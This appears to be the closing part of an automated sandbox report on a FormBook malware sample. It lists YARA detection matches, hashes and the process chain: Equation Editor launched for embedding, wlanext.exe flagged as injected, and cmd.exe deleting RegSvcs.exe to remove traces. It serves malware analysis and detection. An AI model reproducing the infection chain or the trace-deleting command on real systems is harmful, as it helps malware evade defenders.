                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Analysis Process: explorer.exe PID: 1388 Parent PID: 2520

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:50
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:
                                                                                                                                                      Imagebase:0xffca0000
                                                                                                                                                      File size:3229696 bytes
                                                                                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Analysis Process: EQNEDT32.EXE PID: 2700 Parent PID: 584

                                                                                                                                                      General

                                                                                                                                                      Start time:20:05:05
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:543304 bytes
                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: wlanext.exe PID: 2756 Parent PID: 1388

                                                                                                                                                      General

                                                                                                                                                      Start time:20:05:07
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                      Imagebase:0xb30000
                                                                                                                                                      File size:77312 bytes
                                                                                                                                                      MD5 hash:6F44F5C0BC6B210FE5F5A1C8D899AD0A
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Analysis Process: cmd.exe PID: 2812 Parent PID: 2756

                                                                                                                                                      General

                                                                                                                                                      Start time:20:05:11
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                                                                                                                      Imagebase:0x4a5a0000
                                                                                                                                                      File size:302592 bytes
                                                                                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >